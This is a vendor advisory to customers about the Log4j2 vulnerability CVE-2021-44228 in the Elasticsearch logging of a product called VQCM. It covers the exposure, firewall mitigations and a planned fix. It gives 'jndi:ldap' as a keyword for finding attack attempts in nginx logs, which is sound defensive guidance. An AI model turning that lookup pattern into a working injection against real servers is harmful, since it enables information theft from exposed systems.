Over the weekend a critical security issue which impacts Log4j2 (CVE-2021-44228) and all products which use it as a dependency became public. This is a significant and critical level CVE and needs to be treated as such by any company which is even potentially impacted. As the VQCM virtual machine uses Elasticsearch (ES) for logging this issue impacts our products (Kibana is currently listed as not impacted). Due to the nature of the vulnerability and the extensive logging that VQCM provides any publicly exposed component of the VQCM becomes a potential attack surface. This includes the VQCM API / UI, as even a failed login can be used as a crafted log message to carry out an attack against the underlying ES logging.
By default, our product firewall settings block access to the ES port and we recommend that this port is blocked if you have previously opened it. If you have made your VQCM API / UI publicly accessible we recommend removing this public access by placing it behind your own firewall(s) or stopping the exposed service / route.
It is important to note that, as per current Elasticsearch security announcements, ES is not at risk of a Remote Code Execution attack, however it is still at risk of information leak.
As such we strongly advise all customers to immediately block publicly exposed elements of the VQCM instance. We are currently working on a mitigation (seen here – https://www.elastic.co/guide/en/elasticsearch/reference/7.16/advanced-configuration.html#set-jvm-options) for this issue following security announcements from Elasticsearch themselves which we are hoping to get out to customers as soon as we have finished in house security testing. The up-and-coming release of 3.9 (expected release date 17/01/2022) will include a fixed version of the Elasticsearch instance.
Customers who are concerned and want to make sure their instance has not been impacted should check their web traffic logs (nginx) for the following keyword(s) “jndi:ldap”. If customers are unsure on how to do this, please carry out a log dump and make it available to us via our support team. Customers finding positive hits for this will need to assume that there has been an information leak from their VQCM instance and should take appropriate action.
Our support team is on hand for customers who wish to discuss this and would like additional information or help.